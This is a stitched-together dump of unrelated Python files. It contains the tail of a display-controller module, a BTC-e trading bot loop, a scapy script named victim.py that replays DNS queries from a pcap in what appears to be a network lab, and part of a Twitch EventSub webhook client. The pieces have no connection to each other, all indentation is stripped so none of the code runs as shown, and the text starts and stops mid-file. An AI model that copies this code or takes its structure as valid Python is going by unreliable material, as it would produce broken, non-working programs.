fill=(0, 0, 0))
self._display_canvas(img)
'''
================ Externally Available Methods ================
'''
def display_status(self, in_data, status_data):
'''
- Updates the current data for the display loop, if in a work mode
'''
self.units = status_data['units']
self.displayactive = True
self.in_data = in_data
self.status_data = status_data
def display_splash(self):
'''
- Calls Splash Screen
'''
self.displaycommand = 'splash'
def clear_display(self):
'''
- Clear display and turn off backlight
'''
self.displaycommand = 'clear'
def display_text(self, text):
'''
- Display some text
'''
self.displaycommand = 'text'
self.displaydata = text
def display_network(self):
'''
- Display Network IP QR Code
'''
self.displaycommand = 'network'
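# --- Usage sketch (illustrative, not part of the module): the externally available methods
# --- above are meant to be called from the control/work loop. The class name `Display` and
# --- the constructor call below are assumptions; substitute whatever this module exports.
#
# display = Display()                               # constructor arguments omitted
# display.display_splash()                          # show the splash screen on startup
# display.display_status(in_data, status_data)      # push fresh grill/probe data every cycle
# display.display_text('Shutdown')                  # show a one-off text message
# display.display_network()                         # show a QR code pointing at the web UI
# display.clear_display()                           # blank the screen and turn the backlight off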
|
bot.py
|
# Copyright (c) 2013 Alan McIntyre
import datetime
import threading
import time
import traceback
import btceapi
from btceapi.common import validatePair
from trader import TraderBase
def _runBot(bot):
while bot.running:
loop_start = time.time()
# Collect the set of pairs for which we should get depth.
depthPairs = set()
for handler, pairs in bot.depthHandlers:
depthPairs.update(pairs)
# Get current depth
depths = {}
conn = btceapi.BTCEConnection()
for p in depthPairs:
try:
asks, bids = btceapi.getDepth(p, conn)
depths[p] = (datetime.datetime.now(), asks, bids)
except:
bot.onDepthRetrievalError(p, traceback.format_exc())
# Collect the set of pairs for which we should get trade history.
tradeHistoryPairs = set()
for handler, pairs in bot.tradeHistoryHandlers:
tradeHistoryPairs.update(pairs)
tradeHistories = {}
for p in tradeHistoryPairs:
try:
trades = btceapi.getTradeHistory(p, conn)
tradeHistories[p] = (datetime.datetime.now(), trades)
except:
bot.onTradeHistoryRetrievalError(p, traceback.format_exc())
conn.close()
for p, (t, asks, bids) in depths.items():
for handler, pairs in bot.depthHandlers:
if p in pairs:
try:
handler(t, p, asks, bids)
except:
bot.onDepthHandlingError(p, handler, traceback.format_exc())
for p, (t, trades) in tradeHistories.items():
# Merge new trades into the bot's history.
bot.mergeTradeHistory(p, trades)
# Provide full history to traders
for handler, pairs in bot.tradeHistoryHandlers:
if p in pairs:
try:
handler(t, p, bot.tradeHistoryItems[p])
except:
bot.onTradeHistoryHandlingError(p, handler, traceback.format_exc())
# Tell all bots that have requested it that we're at the end
# of an update loop.
for handler in bot.loopEndHandlers:
try:
handler(datetime.datetime.now())
except:
# TODO: refactor this somewhere
t = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
print "%s Error while calling loop end handler (%r): %s" % (t, handler, traceback.format_exc())
while bot.running and time.time() - loop_start < bot.collectionInterval:
time.sleep(0.5)
    # Give traders an opportunity to do thread-specific cleanup.
for t in bot.traders:
t.onExit()
class Bot(object):
def __init__(self, bufferSpanMinutes=10):
self.bufferSpanMinutes = bufferSpanMinutes
self.depthHandlers = []
self.tradeHistoryHandlers = []
self.loopEndHandlers = []
self.collectionInterval = 60.0
self.running = False
self.traders = set()
self.tradeHistoryIds = {}
self.tradeHistoryItems = {}
self.errorHandlers = []
def addErrorHandler(self, handler):
'''Add a handler function taking two arguments: a string describing
what operation was in process, and a string containing the
formatted traceback. If an exception is raised inside the handler,
it will be ignored.'''
# TODO: inspect function to make sure it has
# the right number of arguments.
self.errorHandlers.append(handler)
def onDepthRetrievalError(self, pair, tracebackText):
msg = "Error while retrieving %s depth" % pair
for h in self.errorHandlers:
try:
h(msg, tracebackText)
except:
pass
def onDepthHandlingError(self, pair, handler, tracebackText):
msg = "Error in handler %r for %s depth" % (handler, pair)
for h in self.errorHandlers:
try:
h(msg, tracebackText)
except:
pass
def onTradeHistoryRetrievalError(self, pair, tracebackText):
msg = "Error while retrieving %s trade history" % pair
for h in self.errorHandlers:
try:
h(msg, tracebackText)
except:
pass
def onTradeHistoryHandlingError(self, pair, handler, tracebackText):
msg = "Error in handler %r for %s trade history" % (handler, pair)
for h in self.errorHandlers:
try:
h(msg, tracebackText)
except:
pass
def mergeTradeHistory(self, pair, history):
keys = self.tradeHistoryIds.setdefault(pair, set())
prevItems = self.tradeHistoryItems.get(pair, [])
newItems = []
# Remove old items
now = datetime.datetime.now()
dt = datetime.timedelta(minutes = self.bufferSpanMinutes)
for h in prevItems:
            if now - h.date > dt:  # drop trades older than the buffer span
keys.remove(h.tid)
else:
keys.add(h.tid)
newItems.append(h)
# Add new items
for h in history:
if h.tid not in keys:
keys.add(h.tid)
newItems.append(h)
self.tradeHistoryItems[pair] = newItems
def addTrader(self, trader):
if trader.onNewDepth.__func__ is not TraderBase.onNewDepth.__func__:
self.addDepthHandler(trader.onNewDepth, trader.pairs)
if trader.onNewTradeHistory.__func__ is not TraderBase.onNewTradeHistory.__func__:
self.addTradeHistoryHandler(trader.onNewTradeHistory, trader.pairs)
if trader.onLoopEnd.__func__ is not TraderBase.onLoopEnd.__func__:
self.addLoopEndHandler(trader.onLoopEnd)
self.traders.add(trader)
def addDepthHandler(self, handler, pairs=btceapi.all_pairs):
for p in pairs:
validatePair(p)
self.depthHandlers.append((handler, pairs))
def addTradeHistoryHandler(self, handler, pairs=btceapi.all_pairs):
for p in pairs:
validatePair(p)
self.tradeHistoryHandlers.append((handler, pairs))
def addLoopEndHandler(self, handler):
self.loopEndHandlers.append(handler)
def setCollectionInterval(self, interval_seconds):
self.collectionInterval = interval_seconds
def start(self):
self.running = True
self.thread = threading.Thread(target = _runBot, args=(self,))
self.thread.start()
def stop(self):
self.running = False
self.thread.join()
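# --- Usage sketch (illustrative, not part of the module). Assumes btceapi is installed
# --- and that 'btc_usd' is a valid pair name for it; the handler signatures follow the
# --- add*Handler methods above.
#
# def log_error(msg, tracebackText):
#     pass  # msg describes the failed operation, tracebackText is the formatted traceback
#
# def on_depth(t, pair, asks, bids):
#     pass  # t is the retrieval time; asks/bids come straight from btceapi.getDepth
#
# bot = Bot(bufferSpanMinutes=10)
# bot.addErrorHandler(log_error)
# bot.addDepthHandler(on_depth, pairs=['btc_usd'])
# bot.setCollectionInterval(30.0)
# bot.start()
# ...                    # run until you want to shut down
# bot.stop()             # joins the collection thread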
|
victim.py
|
import argparse
import sys
import socket
import random
import time
import struct
import threading
from scapy.all import *
#from scapy.all import sniff, sendp, send, get_if_list, get_if_hwaddr
#from scapy.all import Packet, IPOption
#from scapy.all import Ether, IP, UDP, TCP, DNS
#from scapy.all import rdpcap
def get_if():
ifs = get_if_list()
iface = None
    for i in ifs:
if "eth0" in i:
iface = i
            break
if not iface:
print('Cannot find eth0 interface')
exit(1)
return iface
def handle_pkt(pkt):
# print num," got a response"
# print pkt.show()
if UDP in pkt and pkt[UDP].sport == 53:
global num
num = num + 1
if num%10 == 1:
print "Get %4dst packet, id: %5d"%(num,pkt.getlayer(DNS).id)
elif num%10 == 2:
print "Get %4dnd packet, id: %5d"%(num,pkt.getlayer(DNS).id)
elif num%10 == 3:
print "Get %4drd packet, id: %5d"%(num,pkt.getlayer(DNS).id)
else:
print "Get %4dth packet, id: %5d"%(num,pkt.getlayer(DNS).id)
sys.stdout.flush()
def recv_pkt(iface):
try:
sniff(iface = iface, prn = lambda x: handle_pkt(x))
except KeyboardInterrupt:
sys.exit(0)
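# main() below replays DNS queries from the pcap. It expects the following on stdin:
#   line 1: N, the number of packets to send
#   then N pairs of lines: a delay in seconds to sleep after sending (a), followed by
#   an index into the list of DNS query packets extracted from the pcap (b).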
def main():
#if len(sys.argv)<3:
# print('pass 2 argument: <destination> "<file.pcap>"')
# exit(1)
# addr = socket.gethostbyname("10.0.3.3") # dns_server
addr = "10.0.3.3"
iface = get_if()
print("iface: ", iface)
pcap = rdpcap("dns0313_2_onlyDNS.pcapng")
q_pkt = []
for pkt in pcap:
if pkt.qr == 0: # the packet is query
q_pkt.append(pkt)
recv_th = threading.Thread(target=recv_pkt, args=(iface,))
recv_th.setDaemon(True)
recv_th.start()
try:
N = raw_input()
socket = conf.L2socket(iface=iface)
for i in range(0,int(N)):
a = raw_input()
b = raw_input()
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff')
pkt = pkt /IP(dst=addr) / UDP(dport=53, sport=random.randint(49152,65535)) / q_pkt[int(b)].getlayer(DNS)
sendp(pkt, iface = iface, verbose=False, socket=socket)
if i%10 == 1:
print "Send %4dst packet, id: %5d"%(i,pkt.getlayer(DNS).id)
elif i%10 == 2:
print "Send %4dnd packet, id: %5d"%(i,pkt.getlayer(DNS).id)
elif i%10 == 3:
print "Send %4drd packet, id: %5d"%(i,pkt.getlayer(DNS).id)
else:
print "Send %4dth packet, id: %5d"%(i,pkt.getlayer(DNS).id)
time.sleep(float(a))
        while True:
            time.sleep(1)  # idle instead of busy-spinning; the daemon sniffer thread does the work
except KeyboardInterrupt:
sys.exit(0)
if __name__ == '__main__':
num = 0
main()
|
eventsub.py
|
# Copyright (c) 2021. Lena "Teekeks" During <info@teawork.de>
"""
Full Implementation of the Twitch EventSub
------------------------------------------
The EventSub client runs in its own thread, calling the given callback function whenever an event happens.
Look at the `Twitch EventSub reference <https://dev.twitch.tv/docs/eventsub/eventsub-reference>`__ to find the topics
you are interested in.
************
Requirements
************
You need to have a public IP with a port open. That port will be 80 by default.
You need app authentication, and your Endpoint URL must point to a publicly reachable webhook callback.
.. note:: Please note that your Endpoint URL has to be HTTPS, has to run on port 443 and requires a valid, non-self-signed certificate.
This most likely means that you need a reverse proxy like nginx. You can also hand in a valid ssl context to be used in the constructor.
You can check whether your webhook is publicly reachable by navigating to the URL set in `callback_url`.
You should get a 200 response with the text `pyTwitchAPI EventSub`.
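If you want this webserver to terminate TLS itself instead of sitting behind a reverse proxy, you can hand in an :code:`ssl.SSLContext`. A minimal sketch (the certificate and key file names are placeholders):
.. code-block:: python
    import ssl
    ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ssl_context.load_cert_chain('fullchain.pem', 'privkey.pem')   # placeholder file names
    # ... then pass ssl_context=ssl_context to the EventSub constructor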
*******************
Listening to topics
*******************
After you have started your EventSub client, you can use the :code:`listen_` prefixed functions to listen to the topics you are interested in.
The function you hand in as a callback will be called whenever that event happens, with the event data as a parameter.
*******************
Short code example:
*******************
.. code-block:: python
from pprint import pprint
from twitchAPI import Twitch, EventSub
# this will be called whenever someone follows the target channel
async def on_follow(data: dict):
pprint(data)
TARGET_USERNAME = 'target_username_here'
WEBHOOK_URL = 'https://url.to.your.webhook.com'
APP_ID = 'your_app_id'
APP_SECRET = 'your_app_secret'
twitch = Twitch(APP_ID, APP_SECRET)
twitch.authenticate_app([])
uid = twitch.get_users(logins=[TARGET_USERNAME])
user_id = uid['data'][0]['id']
# basic setup, will run on port 8080 and a reverse proxy takes care of the https and certificate
hook = EventSub(WEBHOOK_URL, APP_ID, 8080, twitch)
# unsubscribe from all to get a clean slate
hook.unsubscribe_all()
# start client
hook.start()
print('subscribing to hooks:')
hook.listen_channel_follow(user_id, on_follow)
try:
input('press Enter to shut down...')
finally:
hook.stop()
print('done')
********************
Class Documentation:
********************
"""
import datetime
import random
import string
import time
from typing import Union, Callable, Optional, Awaitable
from .helper import TWITCH_API_BASE_URL, remove_none_values
from .types import *
import requests
from aiohttp import web
import threading
import asyncio
from logging import getLogger, Logger
from .twitch import Twitch
from concurrent.futures._base import CancelledError
from ssl import SSLContext
from .types import EventSubSubscriptionTimeout, EventSubSubscriptionConflict, EventSubSubscriptionError
import hmac
import hashlib
CALLBACK_TYPE = Callable[[dict], Awaitable[None]]
class EventSub:
"""EventSub integration for the Twitch Helix API.
:param str callback_url: The full URL of the webhook.
:param str api_client_id: The id of your API client
:param int port: the port on which this webhook should run
:param ~ssl.SSLContext ssl_context: optional ssl context to be used |default| :code:`None`
    :param ~twitchAPI.twitch.Twitch twitch: an app authenticated instance of :code:`Twitch`
:var str secret: A random secret string. Set this for added security.
:var str callback_url: The full URL of the webhook.
:var bool wait_for_subscription_confirm: Set this to false if you don't want to wait for a subscription confirm.
|default| :code:`True`
:var int wait_for_subscription_confirm_timeout: Max time in seconds to wait for a subscription confirmation.
Only used if ``wait_for_subscription_confirm`` is set to True. |default| :code:`30`
:var bool unsubscribe_on_stop: Unsubscribe all currently active Webhooks on calling `stop()`
|default| :code:`True`
"""
secret = ''.join(random.choice(string.ascii_lowercase) for i in range(20))
callback_url = None
wait_for_subscription_confirm: bool = True
wait_for_subscription_confirm_timeout: int = 30
unsubscribe_on_stop: bool = True
_port: int = 80
_host: str = '0.0.0.0'
__twitch: Twitch = None
__ssl_context = None
__client_id = None
__running = False
__callbacks = {}
__active_webhooks = {}
__hook_thread: Union['threading.Thread', None] = None
__hook_loop: Union['asyncio.AbstractEventLoop', None] = None
__hook_runner: Union['web.AppRunner', None] = None
__logger: Logger = None
def __init__(self,
callback_url: str,
api_client_id: str,
port: int,
twitch: Twitch,
ssl_context: Optional[SSLContext] = None):
self.callback_url = callback_url
self.__client_id = api_client_id
self._port = port
self.__ssl_context = ssl_context
self.__twitch = twitch
self.__logger = getLogger('twitchAPI.eventsub')
if not self.callback_url.startswith('https'):
raise RuntimeError('HTTPS is required for authenticated webhook.\n'
                               + 'Either use a non-authenticated webhook or an HTTPS proxy!')
def __build_runner(self):
hook_app = web.Application()
hook_app.add_routes([web.post('/callback', self.__handle_callback),
web.get('/', self.__handle_default)])
return web.AppRunner(hook_app)
def __run_hook(self, runner: 'web.AppRunner'):
self.__hook_runner = runner
self.__hook_loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.__hook_loop)
self.__hook_loop.run_until_complete(runner.setup())
site = web.TCPSite(runner, str(self._host), self._port, ssl_context=self.__ssl_context)
self.__hook_loop.run_until_complete(site.start())
self.__logger.info('started twitch API event sub on port ' + str(self._port))
try:
self.__hook_loop.run_forever()
except (CancelledError, asyncio.CancelledError):
self.__logger.debug('we got cancelled')
def start(self):
"""Starts the EventSub client
:rtype: None
:raises RuntimeError: if EventSub is already running
"""
if self.__running:
raise RuntimeError('already started')
self.__hook_thread = threading.Thread(target=self.__run_hook, args=(self.__build_runner(),))
self.__running = True
self.__hook_thread.start()
def stop(self):
"""Stops the EventSub client
This also unsubscribes from all known subscriptions if unsubscribe_on_stop is True
:rtype: None
"""
if self.__hook_runner is not None and self.unsubscribe_on_stop:
self.unsubscribe_all_known()
tasks = {t for t in asyncio.all_tasks(loop=self.__hook_loop) if not t.done()}
for task in tasks:
task.cancel()
self.__hook_loop.call_soon_threadsafe(self.__hook_loop.stop)
self.__hook_runner = None
self.__running = False
# ==================================================================================================================
# HELPER
# ==================================================================================================================
def __build_request_header(self):
token = self.__twitch.get_app_token()
if token is None:
raise TwitchAuthorizationException('no Authorization set!')
return {
'Client-ID': self.__client_id,
'Content-Type': 'application/json',
'Authorization': f'Bearer {token}'
}
def __api_post_request(self, url: str, data: Union[dict, None] = None):
headers = self.__build_request_header()
return requests.post(url, headers=headers, json=data)
def __api_get_request(self, url: str):
headers = self.__build_request_header()
return requests.get(url, headers=headers)
def __api_delete_request(self, url: str):
headers = self.__build_request_header()
return requests.delete(url, headers=headers)
def __add_callback(self, c_id: str, callback):
self.__callbacks[c_id] = {'id': c_id, 'callback': callback, 'active': False}
def __activate_callback(self, c_id: str):
self.__callbacks[c_id]['active'] = True
def _subscribe(self, sub_type: str, sub_version: str, condition: dict, callback) -> str:
""""Subscribe to Twitch Topic"""
self.__logger.debug(f'subscribe to {sub_type} version {sub_version} with condition {condition}')
data = {
'type': sub_type,
'version': sub_version,
'condition': condition,
'transport': {
'method': 'webhook',
'callback': f'{self.callback_url}/callback',
'secret': self.secret
}
}
r_data = self.__api_post_request(TWITCH_API_BASE_URL + 'eventsub/subscriptions', data=data)
result = r_data.json()
error = result.get('error')
if r_data.status_code == 500:
raise TwitchBackendException(error)
if error is not None:
if error.lower() == 'conflict':
raise EventSubSubscriptionConflict(result.get('message', ''))
raise EventSubSubscriptionError(result.get('message'))
sub_id = result['data'][0]['id']
self.__add_callback(sub_id, callback)
if self.wait_for_subscription_confirm:
timeout = datetime.datetime.utcnow() + datetime.timedelta(
seconds=self.wait_for_subscription_confirm_timeout)
while timeout >= datetime.datetime.utcnow():
if self.__callbacks[sub_id]['active']:
return sub_id
time.sleep(0.01)
self.__callbacks.pop(sub_id, None)
raise EventSubSubscriptionTimeout()
return sub_id
async def _verify_signature(self, request: 'web.Request') -> bool:
expected = request.headers['Twitch-Eventsub-Message-Signature']
hmac_message = request.headers['Twitch-Eventsub-Message-Id'] + \
request.headers['Twitch-Eventsub-Message-Timestamp'] + await request.text()
sig = 'sha256=' + hmac.new(bytes(self.secret, 'utf-8'),
msg=bytes(hmac_message, 'utf-8'),
digestmod=hashlib.sha256).hexdigest().lower()
return sig == expected
# ==================================================================================================================
# HANDLERS
# ==================================================================================================================
async def __handle_default(self, request: 'web.Request'):
return web.Response(text="pyTwitchAPI EventSub")
async def __handle_challenge(self, request: 'web.Request', data: dict):
self.__logger.debug(f'received challenge for subscription {data.get("subscription").get("id")}')
if not await self._verify_signature(request):
            self.__logger.warning('message signature does not match! Discarding message')
return web.Response(status=403)
self.__activate_callback(data.get('subscription').get('id'))
return web.Response(text=data.get('challenge'))
async def __handle_callback(self, request: 'web.Request'):
data: dict = await request.json()
if data.get('challenge') is not None:
return await self.__handle_challenge(request, data)
sub_id = data.get('subscription', {}).get('id')
callback = self.__callbacks.get(sub_id)
if callback is None:
self.__logger.error(f'received event for unknown subscription with ID {sub_id}')
else:
if not await self._verify_signature(request):
                self.__logger.warning('message signature does not match! Discarding message')
return web.Response(status=403)
self.__hook_loop.create_task(callback['callback'](data))
return web.Response(status=200)
def unsubscribe_all(self):
"""Unsubscribe from all subscriptions"""
ids = []
repeat = True
cursor = None
# get all ids
while repeat:
ret = self.__twitch.get_eventsub_subscriptions(after=cursor)
for d in ret.get('data', []):
ids.append(d.get('id'))
cursor = ret.get('pagination', {}).get('cursor')
repeat = cursor is not None
for _id in ids:
succ = self.__twitch.delete_eventsub_subscription(_id)
if not succ:
self.__logger.warning(f'failed to unsubscribe from event {_id}')
self.__callbacks.clear()
def unsubscribe_all_known(self):
"""Unsubscribe from all subscriptions known to this client."""
for key, value in self.__callbacks.items():
self.__logger.debug(f'unsubscribe from event {key}')
succ = self.__twitch.delete_eventsub_subscription(key)
if not succ:
self.__logger.warning(f'failed to unsubscribe from event {key}')
self.__callbacks.clear()
def unsubscribe_topic(self, topic_id: str) -> bool:
"""Unsubscribe from a specific topic."""
result = self.__twitch.delete_eventsub_subscription(topic_id)
if result:
self.__callbacks.pop(topic_id, None)
return result
def listen_channel_update(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A broadcaster updates their channel properties e.g., category, title, mature flag, broadcast, or language.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelupdate
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.update', '1', {'broadcaster_user_id': broadcaster_user_id}, callback)
def listen_channel_follow(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A specified channel receives a follow.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelfollow
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.follow', '1', {'broadcaster_user_id': broadcaster_user_id}, callback)
def listen_channel_subscribe(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A notification when a specified channel receives a subscriber. This does not include resubscribes.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelsubscribe
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.subscribe', '1', {'broadcaster_user_id': broadcaster_user_id}, callback)
def listen_channel_subscription_end(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A notification when a subscription to the specified channel ends.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelsubscriptionend
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.subscription.end', '1', {'broadcaster_user_id': broadcaster_user_id}, callback)
def listen_channel_subscription_gift(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A notification when a viewer gives a gift subscription to one or more users in the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelsubscriptiongift
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.subscription.gift', '1', {'broadcaster_user_id': broadcaster_user_id}, callback)
def listen_channel_subscription_message(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A notification when a user sends a resubscription chat message in a specific channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelsubscriptionmessage
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.subscription.message',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_channel_cheer(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A user cheers on the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelcheer
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.cheer',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_channel_raid(self,
callback: CALLBACK_TYPE,
to_broadcaster_user_id: Optional[str] = None,
from_broadcaster_user_id: Optional[str] = None) -> str:
"""A broadcaster raids another broadcaster’s channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelraid
:param str from_broadcaster_user_id: The broadcaster user ID that created the channel raid you want to get notifications for.
:param str to_broadcaster_user_id: The broadcaster user ID that received the channel raid you want to get notifications for.
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.raid',
'1',
remove_none_values({
'from_broadcaster_user_id': from_broadcaster_user_id,
'to_broadcaster_user_id': to_broadcaster_user_id}),
callback)
def listen_channel_ban(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A viewer is banned from the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelban
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.ban',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_channel_unban(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A viewer is unbanned from the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelunban
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.unban',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_channel_moderator_add(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""Moderator privileges were added to a user on a specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelmoderatoradd
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.moderator.add',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_channel_moderator_remove(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""Moderator privileges were removed from a user on a specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelmoderatorremove
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.moderator.remove',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_channel_points_custom_reward_add(self, broadcaster_user_id: str,
callback: CALLBACK_TYPE) -> str:
"""A custom channel points reward has been created for the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelchannel_points_custom_rewardadd
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
